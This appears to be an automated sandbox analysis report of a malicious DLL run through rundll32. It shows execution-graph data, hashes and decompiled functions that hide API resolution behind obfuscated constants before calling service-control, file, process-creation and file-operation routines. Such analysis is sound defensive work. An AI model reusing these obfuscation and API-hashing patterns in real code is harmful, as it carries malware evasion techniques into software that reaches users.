                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalSection$Enter$Exception@8InitializeLeaveThrow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3253506028-0
                                                                                                                      • Opcode ID: cf9bd6703211ded15ebc294ea5b4eaffa7e14a09b8c66129e44fb6711d6d5733
                                                                                                                      • Instruction ID: 3404b174272e1aedd22e2de365cf3e448d28d784c73140ac4aa41e98356ae93e
                                                                                                                      • Opcode Fuzzy Hash: cf9bd6703211ded15ebc294ea5b4eaffa7e14a09b8c66129e44fb6711d6d5733
                                                                                                                      • Instruction Fuzzy Hash: 5AF0907350031A9BDB10DB58FC88B1AB6AAFB96355F870816F64582123EB3264C48A61
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • EnterCriticalSection.KERNEL32(100575E0,?,?,?,10020C8D,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031), ref: 100206D1
                                                                                                                      • TlsGetValue.KERNEL32 ref: 100206E6
                                                                                                                      • LeaveCriticalSection.KERNEL32(100575E0,?,?,?,10020C8D,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031), ref: 100206FC
                                                                                                                      • LeaveCriticalSection.KERNEL32(100575E0,?,?,?,10020C8D,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031), ref: 10020707
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalSection$Leave$EnterValue
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3969253408-0
                                                                                                                      • Opcode ID: 384891d58c6dafcceaf36b456d2d2389f12afbb41143d91066085e81aa889ef7
                                                                                                                      • Instruction ID: 186a6cd651b3b82d4df79f5272d157dd9dcdda25cd8a7682fbe975f35e4e1d68
                                                                                                                      • Opcode Fuzzy Hash: 384891d58c6dafcceaf36b456d2d2389f12afbb41143d91066085e81aa889ef7
                                                                                                                      • Instruction Fuzzy Hash: 51F0FE76604720DFD320CF64DD8880B73ABEB8925135A9555F842D3123E630F8058F61
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:15.7%
                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                      Signature Coverage:0%
                                                                                                                      Total number of Nodes:1081
                                                                                                                      Total number of Limit Nodes:12
4947->4943 4947->4944 4947->4945 4947->4946 4948 37ea99 3 API calls 4947->4948 4948->4947 4950 379a55 4949->4950 4951 379b65 4950->4951 4955 379b63 4950->4955 5056 3746be 4950->5056 5060 38c3a0 4950->5060 5068 377c37 4950->5068 4953 389e56 GetPEB 4951->4953 4953->4955 4955->4271 4963 381c8c 4957->4963 4958 37ab87 3 API calls 4958->4963 4959 38da22 GetPEB 4959->4963 4960 381dd2 4960->4271 4961 37b6cf GetPEB 4961->4963 4962 378969 GetPEB 4962->4963 4963->4958 4963->4959 4963->4960 4963->4961 4963->4962 4964 38dcf7 2 API calls 4963->4964 4965 3747ce GetPEB 4963->4965 4966 37a8b0 GetPEB 4963->4966 4967 37ea99 3 API calls 4963->4967 4964->4963 4965->4963 4966->4963 4967->4963 4974 37ba53 4968->4974 4969 37bb5e 4969->4271 4970 38c3a0 GetPEB 4970->4974 4971 37bb60 4972 389e56 GetPEB 4971->4972 4972->4969 4973 3746be GetPEB 4973->4974 4974->4969 4974->4970 4974->4971 4974->4973 4975 377c37 GetPEB 4974->4975 4975->4974 4977 389e69 4976->4977 4980 376bf2 4977->4980 4981 376c0c 4980->4981 4982 38aa30 GetPEB 4981->4982 4983 376c8f 4982->4983 4983->4881 4985 37b6e5 4984->4985 4986 38aa30 GetPEB 4985->4986 4987 37b742 4986->4987 4987->4888 4989 378980 4988->4989 4990 38d25e GetPEB 4989->4990 4991 378a5d 4990->4991 4991->4888 4997 37eab9 4992->4997 4993 37ecec 4993->4888 4994 378f65 2 API calls 4994->4997 4995 37ecd6 4998 381e67 2 API calls 4995->4998 4997->4993 4997->4994 4997->4995 4999 3719b8 4997->4999 4998->4993 5000 3719dd 4999->5000 5001 38aa30 GetPEB 5000->5001 5002 371a3f 5001->5002 5002->4997 5007 38bb48 5003->5007 5004 381e67 2 API calls 5004->5007 5006 38be1d 5006->4911 5007->5004 5007->5006 5009 373de2 GetPEB 5007->5009 5023 390ac8 5007->5023 5027 38d8ec 5007->5027 5009->5007 5011 38aa30 GetPEB 5010->5011 5012 373e36 5011->5012 5012->4911 5020 38d3c3 5013->5020 5015 38d82d 5039 389008 5015->5039 5017 38d82b 5017->4911 5018 374b61 GetPEB 5018->5020 5019 38dcf7 2 API calls 5019->5020 5020->5015 5020->5017 5020->5018 5020->5019 5022 37a8b0 GetPEB 5020->5022 5031 38de10 
5020->5031 5035 374241 5020->5035 5022->5020 5024 390af2 5023->5024 5025 38aa30 GetPEB 5024->5025 5026 390b4e 5025->5026 5026->5007 5028 38d8ff 5027->5028 5029 38aa30 GetPEB 5028->5029 5030 38d96e 5029->5030 5030->5007 5032 38de56 5031->5032 5033 38aa30 GetPEB 5032->5033 5034 38deba 5033->5034 5034->5020 5036 374257 5035->5036 5037 38aa30 GetPEB 5036->5037 5038 3742b3 5037->5038 5038->5020 5040 38901a 5039->5040 5041 38aa30 GetPEB 5040->5041 5042 389074 5041->5042 5042->5017 5044 38aa30 GetPEB 5043->5044 5045 387d3e 5044->5045 5045->4934 5049 38df09 5046->5049 5047 38e1a5 5050 390e3a GetPEB 5047->5050 5048 38e1a3 5048->4934 5049->5047 5049->5048 5051 377ff2 2 API calls 5049->5051 5050->5048 5051->5049 5053 388758 5052->5053 5054 38aa30 GetPEB 5053->5054 5055 3887b7 5054->5055 5055->4934 5057 3746e5 5056->5057 5058 38aa30 GetPEB 5057->5058 5059 374737 5058->5059 5059->4950 5061 38c3bc 5060->5061 5062 38c627 5061->5062 5073 37a3a3 5061->5073 5062->4950 5065 37ed7e GetPEB 5066 38c5e2 5065->5066 5066->5062 5067 37ed7e GetPEB 5066->5067 5067->5066 5071 377c52 5068->5071 5069 377df1 5069->4950 5070 38cadf GetPEB 5070->5071 5071->5069 5071->5070 5077 376ca0 5071->5077 5074 37a3c0 5073->5074 5075 38aa30 GetPEB 5074->5075 5076 37a41a 5075->5076 5076->5062 5076->5065 5078 376cb8 5077->5078 5079 38aa30 GetPEB 5078->5079 5080 376d15 5079->5080 5080->5071 5082 37a9e6 5081->5082 5083 38aa30 GetPEB 5082->5083 5084 37aa3f 5083->5084 5084->4287 5086 378ee7 5085->5086 5087 38aa30 GetPEB 5086->5087 5088 378f54 5087->5088 5088->4287 5092 37435e 5089->5092 5090 377ff2 2 API calls 5090->5092 5091 37ae64 GetPEB 5091->5092 5092->5090 5092->5091 5093 37457c 5092->5093 5094 3745a6 5092->5094 5100 37ae64 5093->5100 5094->4287 5097 374e8f 5096->5097 5098 38aa30 GetPEB 5097->5098 5099 374ed7 5098->5099 5099->4287 5101 37ae8b 5100->5101 5102 38aa30 GetPEB 5101->5102 5103 37aee2 5102->5103 5103->5094 5108 38001b 5104->5108 5105 388606 2 API calls 5105->5108 5108->5105 5109 38031b 5108->5109 5111 
37a8b0 GetPEB 5108->5111 5112 37cd29 5108->5112 5116 37ee81 5108->5116 5121 372206 5108->5121 5109->4291 5111->5108 5113 37cd3f 5112->5113 5114 38aa30 GetPEB 5113->5114 5115 37cd9f 5114->5115 5115->5108 5125 388f15 5116->5125 5118 37eff7 5118->5108 5122 37222a 5121->5122 5123 37a42d GetPEB 5122->5123 5124 372249 5123->5124 5124->5108 5126 388f34 5125->5126 5127 38aa30 GetPEB 5126->5127 5128 37efa8 5127->5128 5128->5118 5129 38db43 5128->5129 5130 38db6c 5129->5130 5131 38aa30 GetPEB 5130->5131 5132 38dbd4 5131->5132 5132->5118 5134 377b13 5133->5134 5135 38aa30 GetPEB 5134->5135 5136 377b7c 5135->5136 5136->4300 5138 388b6f 5137->5138 5139 38aa30 GetPEB 5138->5139 5140 388bd5 5139->5140 5140->4132 5144 379df5 5141->5144 5143 37a305 5143->4322 5144->5143 5146 38dcf7 RtlAllocateHeap GetPEB 5144->5146 5147 37a918 GetPEB 5144->5147 5149 3747ce GetPEB 5144->5149 5150 37a8b0 GetPEB 5144->5150 5151 379dcf 2 API calls 5144->5151 5152 374635 5144->5152 5156 377e00 5144->5156 5160 378abf 5144->5160 5146->5144 5147->5144 5149->5144 5150->5144 5151->5144 5153 37464b 5152->5153 5154 38aa30 GetPEB 5153->5154 5155 3746b0 5154->5155 5155->5144 5157 377e18 5156->5157 5158 38aa30 GetPEB 5157->5158 5159 377e79 5158->5159 5159->5144 5161 378ad1 5160->5161 5162 38aa30 GetPEB 5161->5162 5163 378b32 5162->5163 5163->5144 5175 37e2cc 5164->5175 5168 379ba6 5167->5168 5198 3791dd 5168->5198 5173 381e67 2 API calls 5174 379d26 5173->5174 5174->4331 5183 37e2f1 5175->5183 5179 37e4ef 5182 381e67 2 API calls 5179->5182 5181 375357 5181->4331 5182->5181 5183->5179 5183->5181 5184 375988 5183->5184 5187 378e4d 5183->5187 5190 38c15d 5183->5190 5194 372a58 5183->5194 5185 38aa30 GetPEB 5184->5185 5186 3759db 5185->5186 5186->5183 5188 385c73 GetPEB 5187->5188 5189 378eb3 5188->5189 5189->5183 5191 38c176 5190->5191 5192 38aa30 GetPEB 5191->5192 5193 38c1de 5192->5193 5193->5183 5195 372a71 5194->5195 5196 38aa30 GetPEB 5195->5196 5197 372ad6 5196->5197 5197->5183 5199 38aa30 GetPEB 5198->5199 
5200 37923b 5199->5200 5200->5174 5201 3776aa 5200->5201 5202 3776cd 5201->5202 5203 38aa30 GetPEB 5202->5203 5204 377723 5203->5204 5204->5173 5206 38e365 5205->5206 5207 37a42d GetPEB 5206->5207 5208 38e38d 5207->5208 5208->4341 5211 37410d 5209->5211 5212 37421e 5211->5212 5213 38dcf7 2 API calls 5211->5213 5215 37aad6 GetPEB 5211->5215 5216 37421c 5211->5216 5217 37a8b0 GetPEB 5211->5217 5229 371f53 5211->5229 5214 371fd1 GetPEB 5212->5214 5213->5211 5214->5216 5215->5211 5216->4364 5217->5211 5219 386c65 5218->5219 5220 374b61 GetPEB 5219->5220 5221 386d92 5219->5221 5223 386db0 5219->5223 5237 379d31 5219->5237 5220->5219 5233 386637 5221->5233 5223->4364 5226 37b1db 5225->5226 5227 38aa30 GetPEB 5226->5227 5228 37b231 5227->5228 5228->4353 5230 371f6f 5229->5230 5231 38aa30 GetPEB 5230->5231 5232 371fc3 5231->5232 5232->5211 5234 386659 5233->5234 5235 38aa30 GetPEB 5234->5235 5236 3866b7 5235->5236 5236->5223 5238 379d52 5237->5238 5239 38aa30 GetPEB 5238->5239 5240 379dc1 5239->5240 5240->5219 5279 374c5d 5280 374d8d 5279->5280 5281 388606 2 API calls 5280->5281 5286 374dd2 5280->5286 5282 374da8 5281->5282 5287 37cbdf 5282->5287 5285 37a8b0 GetPEB 5285->5286 5288 37cbfb 5287->5288 5289 374dbc 5288->5289 5291 384011 5288->5291 5289->5285 5292 384026 5291->5292 5293 38aa30 GetPEB 5292->5293 5294 384078 5293->5294 5294->5288 5295 380a96 5297 380aa6 5295->5297 5298 384087 GetPEB 5295->5298 5298->5297

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 250 37912c-3791af call 3820b9 call 38aa30 OpenSCManagerW
                                                                                                                      C-Code - Quality: 54%
                                                                                                                      			E0037912C(int __ecx, void* __edx, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				void* _t24;
                                                                                                                      				void* _t32;
                                                                                                                      				signed int _t34;
                                                                                                                      				int _t43;
                                                                                                                      
                                                                                                                      				_push(__ecx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				_push(_a20);
                                                                                                                      				_t43 = __ecx;
                                                                                                                      				_push(_a16);
                                                                                                                      				_push(0);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(0);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E003820B9(_t24);
                                                                                                                      				_v12 = 0x4657ea;
                                                                                                                      				_t34 = 0x1b;
                                                                                                                      				_v12 = _v12 / _t34;
                                                                                                                      				_v12 = _v12 ^ 0x000ac4f3;
                                                                                                                      				_v8 = 0xb5c996;
                                                                                                                      				_v8 = _v8 >> 4;
                                                                                                                      				_v8 = _v8 * 0x19;
                                                                                                                      				_v8 = _v8 + 0x3329;
                                                                                                                      				_v8 = _v8 ^ 0x01161fa0;
                                                                                                                      				E0038AA30(0x14e, 0x20a9b263, _t34, 0x18e12c58);
                                                                                                                      				_t32 = OpenSCManagerW(0, 0, _t43); // executed
                                                                                                                      				return _t32;
                                                                                                                      			}










                                                                                                                      APIs
                                                                                                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,000B11AB), ref: 003791A8
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.560982656.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.560974490.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000A.00000002.561014964.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_370000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ManagerOpen
                                                                                                                      • String ID: WF
                                                                                                                      • API String ID: 1889721586-2390014890
                                                                                                                      • Opcode ID: 1ae6c7d6e897e9fd4074bf1914c4816ed8008dd5649bb50acbdcfee0caf21ed1
                                                                                                                      • Instruction ID: 437d72c7bcf249edf535265df31f9fbf7eb2bffd28cb1e74599ec71f23f504ee
                                                                                                                      • Opcode Fuzzy Hash: 1ae6c7d6e897e9fd4074bf1914c4816ed8008dd5649bb50acbdcfee0caf21ed1
                                                                                                                      • Instruction Fuzzy Hash: 27016971901208FBEB09DB95DD4ACAFBFB8EBC5714F108099F404A7200D3B55F109BA1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 255 3742c4-374345 call 3820b9 call 38aa30 OpenServiceW
                                                                                                                      C-Code - Quality: 48%
                                                                                                                      			E003742C4(void* __ecx, void* __edx, intOrPtr _a4, int _a8, short* _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				void* _t24;
                                                                                                                      				void* _t29;
                                                                                                                      				void* _t34;
                                                                                                                      
                                                                                                                      				_push(__ecx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				_push(_a20);
                                                                                                                      				_t34 = __edx;
                                                                                                                      				_push(_a16);
                                                                                                                      				_push(_a12);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E003820B9(_t24);
                                                                                                                      				_v8 = 0x971c9e;
                                                                                                                      				_v8 = _v8 >> 3;
                                                                                                                      				_v8 = _v8 + 0xbdaa;
                                                                                                                      				_v8 = _v8 | 0x44f2c0c3;
                                                                                                                      				_v8 = _v8 ^ 0x44fb9439;
                                                                                                                      				_v12 = 0x762558;
                                                                                                                      				_v12 = _v12 | 0xdc63e739;
                                                                                                                      				_v12 = _v12 ^ 0xdc7b8d87;
                                                                                                                      				E0038AA30(0x20c, 0x20a9b263, __ecx, 0x47b96070);
                                                                                                                      				_t29 = OpenServiceW(_t34, _a12, _a8); // executed
                                                                                                                      				return _t29;
                                                                                                                      			}









                                                                                                                      APIs
                                                                                                                      • OpenServiceW.ADVAPI32(00000000,?,2635DC09,?,?,?,2635DC09,00384A8F,?,?,2635DC09), ref: 0037433F
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.560982656.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.560974490.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000A.00000002.561014964.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_370000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: OpenService
                                                                                                                      • String ID: X%v
                                                                                                                      • API String ID: 3098006287-3430654708
                                                                                                                      • Opcode ID: a6c45227f0e40a07600cbbb7be6837513f8e3cf64bcdc6244eca30a284eb53f8
                                                                                                                      • Instruction ID: 6c46207559fe28baa97599cef596c3f07856948e3ad7111aaea0ffde47a6c397
                                                                                                                      • Opcode Fuzzy Hash: a6c45227f0e40a07600cbbb7be6837513f8e3cf64bcdc6244eca30a284eb53f8
                                                                                                                      • Instruction Fuzzy Hash: A30104B281120CFBDF16DFD4D9468DEBF79EB14314F148189F90566221D2729B609B91
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      control_flow_graph 260 378f65-379010 call 3820b9 call 38aa30 CreateFileW
                                                                                                                      C-Code - Quality: 35%
                                                                                                                      			E00378F65(intOrPtr __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, long _a12, long _a20, intOrPtr _a24, long _a28, intOrPtr _a32, long _a40) {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				void* _v24;
                                                                                                                      				intOrPtr _v28;
                                                                                                                      				void* _t32;
                                                                                                                      				void* _t38;
                                                                                                                      
                                                                                                                      				_push(_a40);
                                                                                                                      				_push(0);
                                                                                                                      				_push(_a32);
                                                                                                                      				_push(_a28);
                                                                                                                      				_push(_a24);
                                                                                                                      				_push(_a20);
                                                                                                                      				_push(0);
                                                                                                                      				_push(_a12);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E003820B9(_t32);
                                                                                                                      				_v28 = 0xee6fdc;
                                                                                                                      				asm("stosd");
                                                                                                                      				asm("stosd");
                                                                                                                      				asm("stosd");
                                                                                                                      				_v12 = 0x957ab3;
                                                                                                                      				_v12 = _v12 ^ 0x02d9a910;
                                                                                                                      				_v12 = _v12 + 0xffff8488;
                                                                                                                      				_v12 = _v12 ^ 0x02485b8e;
                                                                                                                      				_v8 = 0xf6b813;
                                                                                                                      				_v8 = _v8 + 0xffff9c70;
                                                                                                                      				_v8 = _v8 + 0xffff858c;
                                                                                                                      				_v8 = _v8 ^ 0x00f72129;
                                                                                                                      				E0038AA30(0xe9, 0x9df7cc0d, __ecx, 0xa7362403);
                                                                                                                      				_t38 = CreateFileW(_a4, _a20, _a40, 0, _a28, _a12, 0); // executed
                                                                                                                      				return _t38;
                                                                                                                      			}










                                                                                                                      APIs
                                                                                                                      • CreateFileW.KERNEL32(02485B8E,00EE6FDC,?,00000000,65528FD4,?,00000000), ref: 00379009
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.560982656.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.560974490.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000A.00000002.561014964.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_370000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateFile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 823142352-0
                                                                                                                      • Opcode ID: 18f2a3f1900b150d1c8a29a5a24bb32d68d7ea1513a2f5f5666481f22823c7ab
                                                                                                                      • Instruction ID: 4ef644c63cb17270f9f96c97e70e737ff4730c415eded2b7f7e7ff7dfd550d8d
                                                                                                                      • Opcode Fuzzy Hash: 18f2a3f1900b150d1c8a29a5a24bb32d68d7ea1513a2f5f5666481f22823c7ab
                                                                                                                      • Instruction Fuzzy Hash: AD112B72900219FBCF229FE5DD098DFBFB5EF58354F118189F90862121C3328A61EB91
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      control_flow_graph 265 377f5d-377ff1 call 3820b9 call 38aa30 CreateProcessW
                                                                                                                      APIs
                                                                                                                      • CreateProcessW.KERNEL32(?,?,00000000,00000000,?,00000000,00000000,00000000,?,0037AD99,?,?,?,181C8C04,0037AD99), ref: 00377FEB
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.560982656.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.560974490.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000A.00000002.561014964.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_370000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 963392458-0
                                                                                                                      • Opcode ID: f75a7139c89005ad41842e885698baffe79ed174033219a517191554fa823b18
                                                                                                                      • Instruction ID: 0e077f6d55c0fc79e9b05ece8147445b89fe0ba675fe17c1794b1ecc8317ded7
                                                                                                                      • Opcode Fuzzy Hash: f75a7139c89005ad41842e885698baffe79ed174033219a517191554fa823b18
                                                                                                                      • Instruction Fuzzy Hash: E011D672402118BBDF62AFD1DD09CDF7F79EF093A4F145144F91925121D2768A60EBA1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      control_flow_graph 270 374ddd-374e73 call 3820b9 call 38aa30 SHFileOperationW
                                                                                                                      C-Code - Quality: 16%
                                                                                                                      			E00374DDD(void* __ecx, struct _SHFILEOPSTRUCTW* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				intOrPtr _v20;
                                                                                                                      				intOrPtr _v24;
                                                                                                                      				void* _t30;
                                                                                                                      				int _t38;
                                                                                                                      				signed int _t40;
                                                                                                                      				signed int _t44;
                                                                                                                      				struct _SHFILEOPSTRUCTW* _t45;
                                                                                                                      
                                                                                                                      				_push(_a12);
                                                                                                                      				_t45 = __edx;
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				E003820B9(_t30);
                                                                                                                      				_v16 = _v16 & 0x00000000;
                                                                                                                      				_v24 = 0x8324bd;
                                                                                                                      				_v20 = 0xe59c0f;
                                                                                                                      				_v12 = 0xfa6a5a;
                                                                                                                      				_v12 = _v12 | 0x6fcfbea7;
                                                                                                                      				_t40 = 0x1a;
                                                                                                                      				_push(0x3771311d);
                                                                                                                      				_push(_t40);
                                                                                                                      				_v12 = _v12 * 0x42;
                                                                                                                      				_v12 = _v12 ^ 0xdff430a4;
                                                                                                                      				_v8 = 0x460bc4;
                                                                                                                      				_v8 = _v8 | 0x3946640e;
                                                                                                                      				_push(0xdf0d4f1a);
                                                                                                                      				_v8 = _v8 / _t40;
                                                                                                                      				_v8 = _v8 + 0x2a2;
                                                                                                                      				_v8 = _v8 ^ 0x023f16a4;
                                                                                                                      				_t44 = 0x58;
                                                                                                                      				E0038AA30(_t44);
                                                                                                                      				_t38 = SHFileOperationW(_t45); // executed
                                                                                                                      				return _t38;
                                                                                                                      			}














                                                                                                                      APIs
                                                                                                                      • SHFileOperationW.SHELL32(12DA7D1B,?,?,?,?,?,?,?,?), ref: 00374E6D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.560982656.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.560974490.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000A.00000002.561014964.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_370000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FileOperation
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3080627654-0
                                                                                                                      • Opcode ID: 5a6999f68b0982e57ffb7ab1c7ed40ff32dcce97c4b5d87dd0d5c33dbec08c15
                                                                                                                      • Instruction ID: cf16629af539a33616f49a21373d06cf94cb9efecc183c86d9babfdf080eddca
                                                                                                                      • Opcode Fuzzy Hash: 5a6999f68b0982e57ffb7ab1c7ed40ff32dcce97c4b5d87dd0d5c33dbec08c15
                                                                                                                      • Instruction Fuzzy Hash: C10139B5E01209FBDB14EFA4D9469DEBFB4EF80318F10C089E904AA251D3744B549B91
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      C-Code - Quality: 58%
                                                                                                                      			E00375DDD(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                      				unsigned int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				void* _t21;
                                                                                                                      				intOrPtr* _t25;
                                                                                                                      				void* _t26;
                                                                                                                      				void* _t30;
                                                                                                                      				void* _t31;
                                                                                                                      				void* _t33;
                                                                                                                      				intOrPtr _t34;
                                                                                                                      
                                                                                                                      				_t31 = __edx;
                                                                                                                      				_t34 = __ecx;
                                                                                                                      				E003820B9(_t21);
                                                                                                                      				_v12 = 0x9fac18;
                                                                                                                      				_v12 = _v12 ^ 0x90454497;
                                                                                                                      				_v12 = _v12 ^ 0x90d3245f;
                                                                                                                      				_v8 = 0x647eb;
                                                                                                                      				_v8 = _v8 >> 0xd;
                                                                                                                      				_v8 = _v8 >> 3;
                                                                                                                      				_v8 = _v8 + 0xffff0b9f;
                                                                                                                      				_v8 = _v8 ^ 0xfff54d3d;
                                                                                                                      				_t25 = E0038AA30(0x2d1, 0x9df7cc0d, __ecx, 0x5aaf08f1);
                                                                                                                      				_t26 =  *_t25(_t31, 0, _t34, 0x28, __ecx, __edx, _a4, _a8, 0, _a16, _a20, 0x28, _t30, _t33, __ecx, __ecx); // executed
                                                                                                                      				return _t26;
                                                                                                                      			}












                                                                                                                      APIs
                                                                                                                      • SetFileInformationByHandle.KERNEL32(65528FD4,00000000,?,00000028), ref: 00375E58
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.560982656.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.560974490.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000A.00000002.561014964.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_370000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FileHandleInformation
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3935143524-0
                                                                                                                      • Opcode ID: 1342c75f1a0eb519f77f2bc21feb826310fd141c5a5d19468efb3ead449ac199
                                                                                                                      • Instruction ID: 9e4cb6cc1c812524f59df03c18050d80ee30f982738ed4ed13abd5011f3902e9
                                                                                                                      • Opcode Fuzzy Hash: 1342c75f1a0eb519f77f2bc21feb826310fd141c5a5d19468efb3ead449ac199
                                                                                                                      • Instruction Fuzzy Hash: 5001BC76901308BBDB24DED0CC0AEEEBF74EF95314F108089F50466250D3B05B109BA1
                                                                                                                      Uniqueness
